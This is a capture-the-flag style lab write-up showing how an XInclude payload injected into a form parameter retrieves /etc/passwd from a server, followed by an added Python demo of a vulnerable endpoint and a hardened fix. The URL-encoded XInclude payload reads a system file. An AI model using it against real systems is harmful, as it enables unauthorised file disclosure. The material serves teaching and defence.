Exploiting XInclude to retrieve files

Description

This lab has a "Check stock" feature that embeds the user input inside a server-side XML document that is subsequently parsed.

Because you don't control the entire XML document you can't define a DTD to launch a classic XXE attack.

To solve the lab, inject an XInclude statement to retrieve the contents of the /etc/passwd file.

Approach

Upon accessing the lab, I went straight to the POST /product/stock request, the obvious candidate for an XXE vulnerability. However, the request did not look like an XML submission at all: the Content-Type and body were those of an ordinary form-urlencoded request rather than the usual XML format:

POST /product/stock HTTP/2
Host: 0ac70000048624d6808f9e620065007b.web-security-academy.net
Cookie: session=4DgmiUxtO96sSAye9qcONWYBxy5o7i9h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

productId=1&storeId=1

To confirm that my input was being embedded in an XML document, I referenced an undefined entity called ichyaboy (the leading & is URL-encoded as %26 so that it survives form decoding):

productId=%26ichyaboy;&storeId=1

The error message "Entities are not allowed for security reasons" confirmed that my input was being parsed as XML: the server recognised the entity reference and rejected it rather than treating the parameter as plain text.

Given that I didn't control the entire XML document and couldn't define or modify a DOCTYPE element, I turned to XInclude, a W3C mechanism that lets an XML document pull in content from another resource without needing a DTD. In my case, I aimed to reference the /etc/passwd file. Here's the payload I crafted (URL-encoded, as sent in the productId parameter):

productId=<ichyaboy+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude">
<xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/></ichyaboy>&storeId=1

In this payload, the attribute xmlns:xi="http://www.w3.org/2001/XInclude" binds the xi prefix to the XInclude namespace; the wrapping element name (ichyaboy) is arbitrary. The xi:include element then references an external resource (file:///etc/passwd). The parse="text" attribute matters: /etc/passwd is not well-formed XML, so without it the processor would try to parse the file as XML and fail, whereas with it the raw contents are inserted as text.

Upon sending this payload, I observed the content of the /etc/passwd file in the response, thereby successfully solving the lab.
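To make the server-side mechanism concrete, the following is an added example (not code from the lab or from this write-up) that models a "check stock" endpoint which concatenates user input into an XML template and then runs an XInclude processor over it, next to a hardened version that escapes the input first. It uses only the Python standard library; the template, the element names, the _file_loader helper (which strips a file:// scheme because the stdlib loader only understands bare paths) and the secret file are all assumptions made for the demonstration.

```python
"""Added example: XInclude file retrieval against a modelled stock-check
endpoint, plus the hardened form. Not part of the original write-up."""

import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude
from xml.sax.saxutils import escape

# Hypothetical server-side template. The attacker controls only the values
# substituted into it, not the rest of the document and not a DOCTYPE, so a
# classic XXE is impossible, but an XInclude element is still reachable.
TEMPLATE = (
    "<stockCheck><productId>{product_id}</productId>"
    "<storeId>{store_id}</storeId></stockCheck>"
)

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def _file_loader(href, parse, encoding=None):
    """Resolve hrefs the way a URI-aware XInclude processor would.

    Assumption for the demo: the stdlib default loader only opens bare
    paths, so a file:// scheme is stripped to mimic processors that accept
    file URIs."""
    if href.startswith("file://"):
        href = href[len("file://"):]
    return ElementInclude.default_loader(href, parse, encoding)


def build_payload(href):
    """Decoded form of the write-up's payload; the wrapper name is arbitrary."""
    return (
        f'<ichyaboy xmlns:xi="{XINCLUDE_NS}">'
        f'<xi:include parse="text" href="{href}"/></ichyaboy>'
    )


def probe_entity(product_id, store_id):
    """The write-up's first check: reference an undefined entity.

    Returns the parser error text if parsing fails (proof that the input is
    embedded in a document parsed as XML), or None if it parsed cleanly."""
    try:
        ET.fromstring(TEMPLATE.format(product_id=product_id, store_id=store_id))
    except ET.ParseError as err:
        return str(err)
    return None


def check_stock_vulnerable(product_id, store_id):
    """Raw concatenation, then an XInclude pass: user input becomes markup."""
    root = ET.fromstring(TEMPLATE.format(product_id=product_id, store_id=store_id))
    ElementInclude.include(root, loader=_file_loader)
    # Whatever ended up under <productId> is what the response would echo back.
    return "".join(root.find("productId").itertext())


def check_stock_hardened(product_id, store_id):
    """Escape the input so it can only ever be a text node, and do not run
    XInclude processing on a document built from untrusted data at all."""
    root = ET.fromstring(
        TEMPLATE.format(product_id=escape(product_id), store_id=escape(store_id))
    )
    return "".join(root.find("productId").itertext())


def demo():
    """Write a constructed stand-in for /etc/passwd, attack both versions,
    and return (what the vulnerable endpoint leaks, what the hardened one returns)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed sample line
        secret_path = f.name
    try:
        payload = build_payload("file://" + secret_path)
        leaked = check_stock_vulnerable(payload, "1")
        safe = check_stock_hardened(payload, "1")
    finally:
        os.unlink(secret_path)
    return leaked, safe


if __name__ == "__main__":
    print("probe:", probe_entity("&ichyaboy;", "1"))
    leaked, safe = demo()
    print("vulnerable endpoint returned:\n" + leaked)
    print("hardened endpoint returned:\n" + safe)
```

Running the script shows the constructed file contents coming back from the vulnerable endpoint, while the hardened endpoint returns the attacker's markup as inert text. The two defences are independent: escaping stops user data from ever becoming an element, and skipping the XInclude pass (or leaving it disabled in the parser, as the lab's own server evidently did not) removes the sink entirely; do both where the parser stack allows it.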